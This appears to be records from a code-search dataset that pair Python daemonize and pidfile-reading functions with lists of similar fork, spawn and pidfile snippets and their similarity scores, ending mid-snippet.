def __daemonize(self): # The double fork thing is required to really dettach the eventual process for the current one, including # such weird details as making sure it can never be the session leader for the old process. # Do the first fork. try: pid = os.fork() if pid > 0: # exit first parent sys.exit(0) except OSError, e: sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror)) sys.exit(1) # decouple from parent environment os.chdir("/") # noinspection PyArgumentList os.setsid() os.umask(0) # do second fork try: pid = os.fork() if pid > 0: # exit from second parent sys.exit(0) except OSError, e: sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror)) sys.exit(1) # redirect standard file descriptors sys.stdout.flush() sys.stderr.flush() si = file(self.stdin, 'r') so = file(self.stdout, 'a+') se = file(self.stderr, 'a+', 0) os.dup2(si.fileno(), sys.stdin.fileno()) os.dup2(so.fileno(), sys.stdout.fileno()) os.dup2(se.fileno(), sys.stderr.fileno()) # write pidfile atexit.register(self.delpid) pid = os.getpid() fp = None try: fp = file(self.pidfile, 'w+') # If we are on an OS that supports reading the commandline arguments from /proc, then use that # to write more unique information about the running process to help avoid pid collison. if self.__can_read_command_line(pid): fp.write('%d %s\n' % (pid, self.__read_command_line(pid))) else: fp.write('%d\n' % pid) finally: if fp is not None: fp.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def doTask(self):\n\n def signal_cb(s, f):\n os._exit(0)\n\n for s in signal.SIGTERM, signal.SIGINT, signal.SIGHUP, signal.SIGQUIT:\n signal.signal(s, signal_cb)\n\n # write pidfile\n def atexit_cb():\n print(\"Exit fork\")\n\n atexit.register(atexit_cb)\n\n # Start the write\n i = 0\n while self.pid == 0 or not self.do_fork:\n print(self.msg % os.getpid())\n time.sleep(2)\n i += 1", "def fork():\n\tpass", "def _fork(self):\n if (self._daemonExists()):\n print \"[Error] Could not be daemonized: already in memory\"\n sys.exit(1)\n try:\n pid = os.fork()\n if (pid > 0):\n sys.exit(0)\n except OSError, e:\n print \"[Error] Fork #1 failed: %s (%d)\" % (e.strerror, e.errno)\n sys.exit(1)\n os.chdir(\"/\")\n os.setsid()\n os.umask(0)\n try:\n pid = os.fork()\n if (pid > 0):\n sys.exit(0)\n except OSError, e:\n print \"[Error] Fork #2 failed: %s (%d)\" % (e.strerror, e.errno)\n sys.exit(1)", "def __init__(self, do_fork=True):\n\n self.msg = \"Test msg %d\"\n self.do_fork = do_fork\n try:\n # Store the Fork PID\n with open(\"/tmp/daemon.pids\", \"w\") as f:\n self.pid = os.fork()\n f.write(f\"{self.pid}|{os.getpid()}\\n\")\n\n if self.pid == 0:\n print(\"PID: %d\" % self.pid)\n if not do_fork:\n os._exit(0)\n\n except OSError as error:\n print(\"Unable to fork. Error: %d (%s)\" % (error.errno, error.strerror))\n os._exit(1)\n\n self.doTask()", "def startd(pidfile=''):\n # do the UNIX double-fork magic, see Stevens' \"Advanced \n # Programming in the UNIX Environment\" for details (ISBN 0201563177)\n # http://code.activestate.com/recipes/66012/\n # CHITS SMS code from Bowei Du\n try:\n pid = os.fork()\n if pid > 0:\n log.info(\"Daemon PID %d\" % pid)\n sys.exit(0)\n except OSError, e:\n log.error(\"fork #1 failed: %d (%s)\" % (e.errno, e.strerror))\n sys.exit(1)\n\n os.chdir(\"/\")\n os.setsid()\n # os.umask(0)\n\n try:\n pid = os.fork()\n if pid > 0:\n # exit from second parent, print eventual PID before\n log.info(\"Daemon PID %d\" % pid)\n sys.exit(0)\n except OSError, e:\n log.error(\"fork #2 failed: %d (%s)\" % (e.errno, e.strerror))\n sys.exit(1)\n \n pid = os.getpid()\n pidfile = os.path.basename(pidfile)\n pidfile = os.path.join(PATH, 'log', pidfile)\n if not os.path.exists(pidfile):\n raise ConfigError(\"%s not found\" % pidfile)\n pf = file(pidfile,'r+')\n pf.write(\"%s\\n\" % pid)\n pf.close()\n \n return pid", "def daemonize():\n try:\n pid = os.fork()\n if pid > 0:\n sys.exit(0)\n except OSError, e:\n print >> sys.stderr, \"Fork #1 failed: %d (%s)\" % (e.errno, e.strerror)\n sys.exit(1)\n os.setsid()\n os.umask(0)\n try:\n pid = os.fork()\n if pid > 0:\n print wpath.pidfile\n dirname = os.path.dirname(wpath.pidfile)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n pidfile = open(wpath.pidfile, 'w')\n pidfile.write(str(pid) + '\\n')\n pidfile.close()\n sys.exit(0)\n except OSError, e:\n print >> sys.stderr, \"Fork #2 failed: %d (%s)\" % (e.errno, e.strerror)\n sys.exit(1)\n sys.stdout.flush()\n sys.stderr.flush()\n os.close(sys.__stdin__.fileno())\n os.close(sys.__stdout__.fileno())\n os.close(sys.__stderr__.fileno())\n sys.stdin = open('/dev/null', 'r')", "def daemonize(self):\n try:\n pid = os.fork()\n if pid > 0:\n # exit first parent\n sys.exit(0)\n except OSError, e:\n sys.stderr.write(\"fork #1 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # decouple from parent environment\n os.chdir(\"/\")\n os.setsid()\n os.umask(0)\n\n # do second fork\n try:\n pid = os.fork()\n if pid > 0:\n # exit from second parent\n sys.exit(0)\n except OSError, e:\n sys.stderr.write(\"fork #2 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # redirect standard file descriptors\n sys.stdout.flush()\n sys.stderr.flush()\n si = file(self.stdin, 'r')\n so = file(self.stdout, 'a+')\n se = file(self.stderr, 'a+', 0)\n os.dup2(si.fileno(), sys.stdin.fileno())\n os.dup2(so.fileno(), sys.stdout.fileno())\n os.dup2(se.fileno(), sys.stderr.fileno())\n\n # write pidfile\n atexit.register(self.delpid)\n pid = str(os.getpid())\n file(self.pidfile,'w+').write(\"%s\\n\" % pid)", "def daemonize(self):\n try:\n pid = os.fork()\n if pid > 0:\n # exit first parent\n sys.exit(0)\n except OSError as e:\n sys.stderr.write(\"fork #1 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # decouple from parent environment\n os.chdir(\"/\")\n os.setsid()\n os.umask(0)\n\n # do second fork\n try:\n pid = os.fork()\n if pid > 0:\n # exit from second parent\n sys.exit(0)\n except OSError as e:\n sys.stderr.write(\"fork #2 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # redirect standard file descriptors\n sys.stdout.flush()\n sys.stderr.flush()\n si = open(self.stdin, 'r')\n so = open(self.stdout, 'a+')\n se = open(self.stderr, 'a+')\n os.dup2(si.fileno(), sys.stdin.fileno())\n os.dup2(so.fileno(), sys.stdout.fileno())\n os.dup2(se.fileno(), sys.stderr.fileno())\n\n # write pidfile\n atexit.register(self.delpid)\n pid = str(os.getpid())\n open(self.pidfile,'w+').write(\"%s\\n\" % pid)", "def daemonize(self):\n try:\n pid = os.fork()\n if pid > 0:\n # exit first parent\n sys.exit(0)\n except OSError as e:\n sys.stderr.write(\"fork #1 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # decouple from parent environment\n os.chdir('/')\n os.setsid()\n os.umask(0)\n\n # do second fork\n try:\n pid = os.fork()\n if pid > 0:\n # exit from second parent\n sys.exit(0)\n except OSError as e:\n sys.stderr.write(\"fork #2 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # redirect standard file descriptors\n sys.stdout.flush()\n sys.stderr.flush()\n si = file(self.stdin, 'r')\n so = file(self.stdout, 'a+')\n se = file(self.stderr, 'a+', 0)\n os.dup2(si.fileno(), sys.stdin.fileno())\n os.dup2(so.fileno(), sys.stdout.fileno())\n os.dup2(se.fileno(), sys.stderr.fileno())\n\n # write pidfile\n atexit.register(self.delpid)\n pid = str(os.getpid())\n file(self.pidfile,'w+').write(\"%s\\n\" % pid)", "def spawn(self):\r\n self.before_spawn()\r\n pid = Subprocess.spawn(self)\r\n if pid is None:\r\n #Remove object reference to decrement the reference count on error\r\n self.fcgi_sock = None\r\n return pid", "def daemonize(self):\n try:\n pid = os.fork()\n if pid > 0:\n # exit first parent\n sys.exit(0)\n except OSError, err:\n sys.stderr.write(\"fork #1 failed: %d (%s)\\n\" %\n (err.errno, err.strerror))\n sys.exit(1)\n\n # decouple from parent environment\n os.chdir(\"/\")\n os.setsid()\n os.umask(0)\n\n # do second fork\n try:\n pid = os.fork()\n if pid > 0:\n # exit from second parent\n sys.exit(0)\n except OSError, err:\n sys.stderr.write(\"fork #2 failed: %d (%s)\\n\" %\n (err.errno, err.strerror))\n sys.exit(1)\n\n # redirect standard file descriptors\n sys.stdout.flush()\n sys.stderr.flush()\n stin = file(self.stdin, 'r')\n stout = file(self.stdout, 'a+')\n sterr = file(self.stderr, 'a+', 0)\n os.dup2(stin.fileno(), sys.stdin.fileno())\n os.dup2(stout.fileno(), sys.stdout.fileno())\n os.dup2(sterr.fileno(), sys.stderr.fileno())\n\n # write pidfile\n atexit.register(self.delpid)\n pid = str(os.getpid())\n file(self.pidfile, 'w+').write(\"%s\\n\" % pid)", "def fork(self):\n try:\n pid = os.fork()\n if pid > 0:\n sys.exit(0)\n except OSError as e:\n sys.stderr.write(\"Fork failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)", "def daemonize(self):\n\t\ttry: \n\t\t\tpid = os.fork() \n\t\t\tif pid > 0:\n\t\t\t\t# exit first parent\n\t\t\t\tsys.exit(0) \n\t\texcept OSError, e: \n\t\t\tsys.stderr.write(\"fork #1 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n\t\t\tsys.exit(1)\n\t\n\t\t# decouple from parent environment\n\t\tos.chdir(\"/\") \n\t\tos.setsid() \n\t\tos.umask(0) \n\t\n\t\t# do second fork\n\t\ttry: \n\t\t\tpid = os.fork() \n\t\t\tif pid > 0:\n\t\t\t\t# exit from second parent\n\t\t\t\tsys.exit(0) \n\t\texcept OSError, e: \n\t\t\tsys.stderr.write(\"fork #2 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n\t\t\tsys.exit(1) \n\t\n\t\t# redirect standard file descriptors\n\t\tsys.stdout.flush()\n\t\tsys.stderr.flush()\n\t\tsi = file(self.stdin, 'r')\n\t\tso = file(self.stdout, 'a+')\n\t\tse = file(self.stderr, 'a+', 0)\n\t\tos.dup2(si.fileno(), sys.stdin.fileno())\n\t\tos.dup2(so.fileno(), sys.stdout.fileno())\n\t\tos.dup2(se.fileno(), sys.stderr.fileno())\n\t\n\t\t# write pidfile\n\t\tatexit.register(self.delpid)\n\t\tpid = str(os.getpid())\n\t\tfile(self.pidfile,'w+').write(\"%s\\n\" % pid)", "async def fork(pid, cin, state_info):\n do = reporter(state_info, pid)\n\n while True:\n # wait for fork grab\n phil_hand = await do('wg', cin())\n\n # wait for philosopher to pick up fork\n await do('wu', phil_hand())\n\n # wait for philosopher to put down fork\n await do('wd', phil_hand())", "def _forkLifeMain(forkList, addForkQueue):\n needsReplacement = set(forkList)\n\n try:\n def onKillSignal(sig, frame):\n # As the main fork, we do not reap cherrypy's SIGTERM processing.\n # We need to convert SIGTERM into an exception so that we \n # appropriately kill our forks and shutdown.\n raise Exception(\"SIGTERM received\")\n signal.signal(signal.SIGTERM, onKillSignal)\n \n # We don't care about child processes.\n signal.signal(signal.SIGCHLD, signal.SIG_IGN)\n \n while True:\n try:\n oldPid = addForkQueue.get(timeout = 5)\n except Empty:\n # Shouldn't make a new fork, but do check on the ones that\n # are alive.\n pass\n else:\n # Before just starting a new process, make sure this pid is\n # still in our needsReplacement set. If it's not, we've\n # already spawned a replacement child, and spawning another\n # would create too many forks.\n if oldPid in needsReplacement:\n needsReplacement.remove(oldPid)\n pid = os.fork()\n if pid == 0:\n # We're the new child! Hooray! Unset our signal\n # handler as cherrypy will install its own.\n signal.signal(signal.SIGTERM, signal.SIG_DFL)\n signal.signal(signal.SIGCHLD, signal.SIG_DFL)\n return\n forkList.append(pid)\n # Add the new pid so it will get replaced\n needsReplacement.add(pid)\n\n # Clean out forkList\n for pid in forkList[:]:\n if not _checkAlive(pid):\n forkList.remove(pid)\n # And restart a new one when one dies\n addForkQueue.put(pid)\n\n except:\n # If there was any error, kill all forks and exit\n _killForks(forkList)\n raise", "def daemonize(pidfile):\n\n try:\n pid = os.fork()\n except OSError as e:\n raise Exception(\"%s [%d]\" % (e.strerror, e.errno))\n\n if (pid == 0): # The first child.\n os.setsid()\n try:\n pid = os.fork() # Fork a second child.\n except OSError as e:\n raise Exception(\"%s [%d]\" % (e.strerror, e.errno))\n\n if (pid == 0): # The second child.\n os.chdir(WORKDIR)\n os.umask(UMASK)\n for i in range(3):\n os.close(i)\n os.open(REDIRECT_TO, os.O_RDWR|os.O_CREAT) # standard input (0)\n os.dup2(0, 1) # standard output (1)\n os.dup2(0, 2) # standard error (2)\n try:\n fp = open(pidfile, 'w')\n fp.write(str(os.getpid()))\n fp.close()\n except:\n pass\n else:\n os._exit(0) # Exit parent (the first child) of the second child.\n else:\n os._exit(0) # Exit parent of the first child.", "def patched_fork(self):\n pid = self.original_os_fork()\n if not pid:\n _LOG('Fork detected. Reinstalling Manhole.')\n self.reinstall()\n return pid", "def daemonize(pidfile):\n\tstdin='/dev/null'\n\tstdout='/dev/null'\n\tstderr='/dev/null'\n\ttry: \n\t\tpid = os.fork() \n\t\tif pid > 0:\n\t\t\t# exit first parent\n\t\t\tsys.exit(0) \n\texcept OSError, e:\n\t\tlogger.critical(\"fork #1 failed: %s\",e) \n\t\tsys.stderr.write(\"fork #1 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n\t\tsys.exit(1)\n\n\t# decouple from parent environment\n\tos.chdir(\"/\") \n\tos.setsid() \n\tos.umask(0) \n\n\t# do second fork\n\ttry: \n\t\tpid = os.fork() \n\t\tif pid > 0:\n\t\t\t# exit from second parent\n\t\t\tsys.exit(0) \n\texcept OSError, e: \n\t\tlogger.critical(\"fork #2 failed: %s\",e) \n\t\tsys.stderr.write(\"fork #2 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n\t\tsys.exit(1) \n\n\t# redirect standard file descriptors\n\tsys.stdout.flush()\n\tsys.stderr.flush()\n\tsi = file(stdin, 'r')\n\tso = file(stdout, 'a+')\n\tse = file(stderr, 'a+', 0)\n\tos.dup2(si.fileno(), sys.stdin.fileno())\n\tos.dup2(so.fileno(), sys.stdout.fileno())\n\tos.dup2(se.fileno(), sys.stderr.fileno())\n\n\t# write pidfile\n\tatexit.register(delpid,pidfile,)\n\tpid = str(os.getpid())\n\tfile(pidfile,'w+').write(\"%s\\n\" % pid)", "def __call__(self, child_func, child_args=[], child_kwds={}):\n if self.__process is not None:\n raise BusyError(\"Another process is already being monitored\")\n self.__exit_code = None\n self.__process = Process(child_func, child_args=child_args, child_kwds=\n child_kwds)\n thrd = self._thrd = threading.Thread(target=self._thrdfunc, daemon=\n self._daemon)\n thrd.start()", "def daemonize(pidfile):\n\n # fork and exit parent process\n try:\n child_pid = os.fork()\n if child_pid > 0:\n # parent can exit\n sys.exit(0)\n elif child_pid == 0:\n # child does nothing\n pass\n else:\n logging.error(\"Aborting. Failed to fork: %s\" % e.strerror)\n sys.exit(1);\n except OSError, e:\n logging.error(\"Aborting. Failed to fork: %s\" % e.strerror)\n sys.exit(1)\n\n # get rid of any outside influence\n os.setsid()\n\n # fork again to prevent zombies\n try:\n child_pid = os.fork()\n if child_pid > 0:\n # parent can exit\n sys.exit(0)\n elif child_pid == 0:\n # child creates PIDFILE\n logging.info(\"Fork successful. PID is %d\" % os.getpid())\n if pidfile:\n pidfileh = open(pidfile, 'w')\n pidfileh.write('%d\\n' % os.getpid())\n pidfileh.close()\n atexit.register(os.remove, pidfile)\n else:\n logging.error(\"Aborting. Failed to fork: %s\" % e.strerror)\n sys.exit(1);\n\n except OSError, e:\n logging.error(\"Aborting. Failed to fork: %s\" % e.strerror)\n sys.exit(1)", "def spawn(self):\r\n options = self.config.options\r\n\r\n if self.pid:\r\n msg = 'process %r already running' % self.config.name\r\n options.logger.warn(msg)\r\n return\r\n\r\n self.killing = 0\r\n self.spawnerr = None\r\n self.exitstatus = None\r\n self.system_stop = 0\r\n self.administrative_stop = 0\r\n\r\n self.laststart = time.time()\r\n\r\n self._assertInState(ProcessStates.EXITED, ProcessStates.FATAL,\r\n ProcessStates.BACKOFF, ProcessStates.STOPPED)\r\n\r\n self.change_state(ProcessStates.STARTING)\r\n\r\n try:\r\n filename, argv = self.get_execv_args()\r\n except ProcessException as what:\r\n self.record_spawnerr(what.args[0])\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n return\r\n\r\n try:\r\n self.dispatchers, self.pipes = self.config.make_dispatchers(self)\r\n except OSError as why:\r\n code = why.args[0]\r\n if code == errno.EMFILE:\r\n # too many file descriptors open\r\n msg = 'too many open files to spawn %r' % self.config.name\r\n else:\r\n msg = 'unknown error: %s' % errno.errorcode.get(code, code)\r\n self.record_spawnerr(msg)\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n return\r\n\r\n try:\r\n pid = options.fork()\r\n except OSError as why:\r\n code = why.args[0]\r\n if code == errno.EAGAIN:\r\n # process table full\r\n msg = ('Too many processes in process table to spawn %r' %\r\n self.config.name)\r\n else:\r\n msg = 'unknown error: %s' % errno.errorcode.get(code, code)\r\n\r\n self.record_spawnerr(msg)\r\n self._assertInState(ProcessStates.STARTING)\r\n self.change_state(ProcessStates.BACKOFF)\r\n options.close_parent_pipes(self.pipes)\r\n options.close_child_pipes(self.pipes)\r\n return\r\n\r\n if pid != 0:\r\n return self._spawn_as_parent(pid)\r\n\r\n else:\r\n return self._spawn_as_child(filename, argv)", "def daemonize(self):\n try:\n pid = os.fork()\n if pid > 0:\n # exit first parent\n sys.exit(0)\n except OSError, e:\n sys.stderr.write(\"fork #1 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # decouple from parent environment\n # os.chdir(\"/\")\n os.setsid()\n os.umask(0)\n\n # do second fork\n try:\n pid = os.fork()\n if pid > 0:\n # exit from second parent\n sys.exit(0)\n except OSError, e:\n sys.stderr.write(\"fork #2 failed: %d (%s)\\n\" % (e.errno, e.strerror))\n sys.exit(1)\n\n # redirect standard file descriptors\n logging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s:%(levelname)s:%(name)s:%(message)s',\n filename=self.logname,\n filemode='a'\n )\n\n stdout_logger = logging.getLogger('STDOUT')\n sl = StreamToLogger(stdout_logger, logging.INFO)\n sys.stdout = sl\n\n stderr_logger = logging.getLogger('STDERR')\n sl = StreamToLogger(stderr_logger, logging.ERROR)\n sys.stderr = sl\n\n # write pidfile\n atexit.register(self.delpid)\n pid = str(os.getpid())\n file(self.pidfile,'w+').write(\"%s\\n\" % pid)", "def __daemonize(self):\n\n pid = os.fork()\n if not pid > 0:\n cpid = os.fork()\n\n if cpid > 0:\n sys.exit(0)\n\n os.setsid();\n (nr_of_fds,ignore) = resource.getrlimit(RLIMIT_NOFILE)\n\n for i in range(0,nr_of_fds):\n try:\n os.close(i)\n except OSError:\n pass\n else:\n sys.exit(0)", "def daemonize(self):\n pid = os.fork()\n if pid != 0:\n LOG.debug(\"taskmasterd forked; parent exiting\")\n os._exit(0)\n LOG.info(\"daemonizing the taskmasterd process\")\n try:\n os.chdir(self.directory)\n except OSError as err:\n LOG.critical(\"can't chdir into %r: %s\" % (self.directory, err))\n else:\n LOG.debug(\"set current directory: %r\" % self.directory)\n os.close(0)\n self.stdin = sys.stdin = sys.__stdin__ = open(\"/dev/null\")\n os.close(1)\n self.stdout = sys.stdout = sys.__stdout__ = open(\"/dev/null\", \"w\")\n os.close(2)\n self.stderr = sys.stderr = sys.__stderr__ = open(\"/dev/null\", \"w\")\n os.setsid()\n os.umask(self.umask)", "def start(self):\n self._proc = self._get_subprocess()\n self._pid = self._proc.pid\n self._return_code = None", "def __init__(self):\n self.child = os.fork()\n if self.child == 0:\n return\n else:\n self.watch()", "def launch(self):\n self._fork()\n self._lock()\n os.setegid(self._user[1])\n os.seteuid(self._user[0])\n self._loop = True\n signal.signal(signal.SIGTERM, self.__signalHandler)\n sys.stdout = self._output\n sys.stderr = self._error\n self._run()\n sys.stdout = self._stdout\n sys.stderr = self._stderr\n os.setegid(0)\n os.seteuid(0)\n self._unlock()", "def daemonize(pidfile=\"\"):\n \n if (pidfile):\n if os.path.exists(pidfile):\n sys.exit(\"The pidfile \" + pidfile + \" already exists, Trakt for VLC may still be running.\")\n try:\n file(pidfile, 'w').write(\"pid\\n\")\n except IOError, e:\n sys.exit(\"Unable to write PID file: %s [%d]\" % (e.strerror, e.errno))\n \n # Make a non-session-leader child process\n try:\n pid = os.fork() #@UndefinedVariable - only available in UNIX\n if pid != 0:\n sys.exit(0)\n except OSError, e:\n raise RuntimeError(\"1st fork failed: %s [%d]\" %\n (e.strerror, e.errno))\n\n os.setsid() #@UndefinedVariable - only available in UNIX\n\n # Make sure I can read my own files and shut out others\n prev = os.umask(0)\n os.umask(prev and int('077', 8))\n\n # Make the child a session-leader by detaching from the terminal\n try:\n pid = os.fork() #@UndefinedVariable - only available in UNIX\n if pid != 0:\n sys.exit(0)\n except OSError, e:\n raise RuntimeError(\"2nd fork failed: %s [%d]\" %\n (e.strerror, e.errno))\n\n dev_null = file('/dev/null', 'r')\n os.dup2(dev_null.fileno(), sys.stdin.fileno())\n \n if (pidfile):\n file(pidfile, \"w\").write(\"%s\\n\" % str(os.getpid()))", "def spawn(cmd, cwd=None):\n\t# FROM: http://stackoverflow.com/questions/972362/spawning-process-from-python\n\t# fork the first time (to make a non-session-leader child process)\n\ttry:\n\t\tpid = os.fork()\n\texcept OSError as e:\n\t\traise RuntimeError(\"1st fork failed: %s [%d]\" % (e.strerror, e.errno))\n\tif pid != 0:\n\t\t# parent (calling) process is all done\n\t\treturn pid\n\t# detach from controlling terminal (to make child a session-leader)\n\tos.setsid()\n\ttry:\n\t\tpid = os.fork()\n\texcept OSError as e:\n\t\traise RuntimeError(\"2nd fork failed: %s [%d]\" % (e.strerror, e.errno))\n\tif pid != 0:\n\t\t# child process is all done\n\t\tos._exit(0)\n\t# grandchild process now non-session-leader, detached from parent\n\t# grandchild process must now close all open files\n\ttry:\n\t\tmaxfd = os.sysconf(\"SC_OPEN_MAX\")\n\texcept (AttributeError, ValueError):\n\t\tmaxfd = 1024\n\tfor fd in range(maxfd):\n\t\ttry:\n\t\t\tos.close(fd)\n\t\texcept OSError: # ERROR, fd wasn't open to begin with (ignored)\n\t\t\tpass\n\t# redirect stdin, stdout and stderr to /dev/null\n\tif (hasattr(os, \"devnull\")):\n\t\tREDIRECT_TO = os.devnull\n\telse:\n\t\tREDIRECT_TO = \"/dev/null\"\n\tos.open(REDIRECT_TO, os.O_RDWR) # standard input (0)\n\tos.dup2(0, 1)\n\tos.dup2(0, 2)\n\t# and finally let's execute the executable for the daemon!\n\ttry:\n\t\targs = filter(lambda _:_, map(lambda _:_.strip(), cmd.split(\" \")))\n\t\tpath_to_executable = args[0]\n\t\targs = args[1:]\n\t\tos.execv(path_to_executable, args)\n\texcept Exception as e:\n\t\t# oops, we're cut off from the world, let's just give up\n\t\tos._exit(255)", "def onPreFork(self):" ]
[ "0.6289691", "0.6277763", "0.6235509", "0.6211188", "0.61053115", "0.59950376", "0.59734493", "0.5932291", "0.5924541", "0.59134763", "0.5890534", "0.5890318", "0.58181685", "0.5802295", "0.57700944", "0.57442904", "0.5697643", "0.56894493", "0.56711257", "0.5625068", "0.56202984", "0.56094694", "0.5603913", "0.5539175", "0.5469471", "0.546444", "0.545406", "0.5423536", "0.5372618", "0.5291311" ]
0.6278399
1
Reads the pid file and returns the process id contained in it. This also verifies as best as it can that the process returned is running and is really an agent process. The id of the agent process or None if there is none or it cannot be read.
def __read_pidfile(self): try: pf = file(self.pidfile, 'r') contents = pf.read().strip().split() pf.close() except IOError: return None pid = int(contents[0]) try: os.kill(pid, 0) except OSError, e: # ESRCH indicates the process is not running, in which case we ignore the pidfile. if e.errno == errno.ESRCH: return None # EPERM indicates the current user does not have permission to signal the process.. so it exists # but may not be the agent process. We will just try our /proc/pid/commandline trick below if we can. elif e.errno != errno.EPERM: raise e # If we got here, the process is running, and we have to see if we can determine if it is really the # original agent process. For Linux systems with /proc, we see if the commandlines match up. # For all other Posix systems, (Mac OS X, etc) we bail for now. if not self.__can_read_command_line(pid): return pid # Handle the case that we have an old pid file that didn't have the commandline right into it. if len(contents) == 1: return pid command_line = self.__read_command_line(pid) if contents[1] == command_line: return pid else: return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getPid(self):\n try:\n fh = open(self.filename)\n except OSError:\n return None\n line = fh.readline()\n try:\n return string.atoi(line) # trailing newline doesn't matter\n except ValueError:\n return None", "def get_pid(self):\n\t\ttry:\n\t\t\tpid_file = open(self.pid_file_path, 'r');\n\t\t\tpid = int(pid_file.read().strip())\n\t\t\tpid_file.close()\n\t\texcept:\n\t\t\tpid = -1;\n\t\treturn pid", "def get_pid(self):\n try:\n pf = open(self.pidfile,'r')\n pid = int(pf.read().strip())\n pf.close()\n except (IOError, TypeError):\n pid = None\n return pid", "def get_pid(self):\n if self.status():\n file = open(os.path.join(self.data_dir, 'postmaster.pid'))\n pid = int(file.readline())\n return pid\n else:\n return None", "def read_pid(self):\n result = read_pid_from_pidfile(self.path)\n return result", "def status(pid_file):\n if not os.path.exists(pid_file):\n return None\n\n pid = None\n with open(pid_file, \"r\") as pf:\n pid = pf.read().strip()\n\n if not pid:\n logger.error(\"Unable to retrieve pid from %s\" % pid_file)\n return None\n\n if not pid.isdigit():\n logger.error(\"Invalid pid %s read from %s\" % (pid, pid_file))\n return None\n\n pid = int(pid)\n\n try:\n # Send 0 signal to check if the process is alive.\n os.kill(pid, 0)\n except OSError as e:\n logger.debug(\"%s\" % e, exc_info=True)\n return None\n return pid", "def get_pid(self, file_path) -> int | None:\n if file_path in self._processors:\n return self._processors[file_path].pid\n return None", "def get_pidfile(self):\n pid = None\n \n # checking if the file exists on system\n if not os.path.exists(self._pidfile):\n return pid\n \n # read the pid\n with open(self._pidfile, 'r') as f:\n pid = int(f.read().strip())\n\n return pid", "def read_pid_from_pidfile(pidfile_path):\n pid = None\n try:\n pidfile = open(pidfile_path, 'r')\n except IOError:\n pass\n else:\n line = pidfile.read().strip()\n try:\n pid = int(line)\n except ValueError:\n pass\n pidfile.close()\n\n return pid", "def get_pid(pidfile):\n pid = None\n if os.path.exists(pidfile):\n with open(pidfile, 'r') as f:\n pid = f.read()\n return pid", "def get_ts_pid(pidfile):\n try:\n with open(pidfile) as f:\n pid = f.readline()\n if pid.strip().isdigit():\n pid = int(pid.strip())\n else:\n LOG.warning(\"Unable to read pidfile %s file contains %r; process metrics will fail!\", pidfile, pid)\n pid = None\n except EnvironmentError:\n LOG.warning(\"Unable to read pidfile %s; process metrics will fail!\", pidfile)\n pid = None\n return pid", "def pid(self) -> str:\n if not self.pid_path.exists():\n return None\n try:\n with open(self.pid_path, 'r') as f:\n text = f.read()\n except Exception as e:\n warn(e)\n text = None\n return text.rstrip('\\n') if text is not None else text", "def pidof(processname = None):\n processname = os.path.basename(processname)\n pidpath = os.path.join(pid_path,processname + \".pid\")\n if processname is not None and os.path.exists(pidpath):\n f = open (pidpath)\n pids = f.readlines()\n f.close()\n return pids\n else:\n return False", "def _get_pid(self):\n ps_txt = six.ensure_str(self.controller.run(\n args=[\"ps\", \"ww\", \"-u\"+str(os.getuid())]\n ).stdout.getvalue()).strip()\n lines = ps_txt.split(\"\\n\")[1:]\n\n for line in lines:\n if line.find(\"ceph-{0} -i {1}\".format(self.daemon_type, self.daemon_id)) != -1:\n log.info(\"Found ps line for daemon: {0}\".format(line))\n return int(line.split()[0])\n log.info(\"No match for {0} {1}: {2}\".format(\n self.daemon_type, self.daemon_id, ps_txt\n ))\n return None", "def pid(self):\n # type: () -> Optional[int]\n try:\n return self._process.pid # type: ignore # pylint: disable=no-member\n except:\n return None", "def get_process_pid(robot_name):\n\n try:\n result = check_output(['pgrep', 'x{0}'.format(robot_name)])\n return int(result.strip())\n except:\n return None", "def pid(self):\n return self._process.pid", "def getStepPID(stepSpace, stepName):\n currDir = stepSpace.location\n pidFile = os.path.join(currDir, 'process_id')\n if not os.path.isfile(pidFile):\n msg = \"Could not find process ID file for step %s\" % stepName\n logging.error(msg)\n return\n\n with open(pidFile, 'r') as filehandle:\n output = filehandle.read()\n\n try:\n stepPID = int(output)\n except ValueError:\n msg = \"Couldn't find a number\"\n logging.error(msg)\n return None\n\n return stepPID", "def pid(self):\n return self._get_process_id()", "def get_pid(name):\n try: \n for process in psutil.process_iter():\n try:\n proc = process.as_dict(attrs=['pid', 'name'])\n if name in proc['name']:\n pid = proc['pid']\n logging.info(f\"Found PID {pid} for {name}\")\n return int(pid) \n except (psutil.NoSuchProcess, psutil.AccessDenied , psutil.ZombieProcess) :\n pass \n except Exception as e:\n logging.exception(f\"EXCEPTION: {e} \\n Full stack trace: \\n\", exc_info=1)", "def pid(self):\n\n return getpid() if self.__process is None else self.__process.pid", "def getPID(self):\r\n self._update('getPID')\r\n return self.supervisord.options.get_pid()", "def pid(self):\n if self.proc is None:\n return 0\n return self._pid()", "def _get_pid(split_data, sensor):\n prot, ip_dst, port_dst, timestamp = split_data\n prot = prot.lower()\n\n if not sanitizer.check_get_pid_params(prot, ip_dst, port_dst, timestamp):\n return '-1,error checking input'\n\n return sensor.search_process(prot, ip_dst, port_dst, timestamp)", "def get_daemon_pid():\n try:\n return _get_pid_from_pidfile()\n except (FileNotFoundError, ValueError):\n return None", "def pid(self):\n return self._query_status()['pid']", "def get_pid(name, path=None):\n if name not in list_(limit=\"running\", path=path):\n raise CommandExecutionError(\n f\"Container {name} is not running, can't determine PID\"\n )\n info = 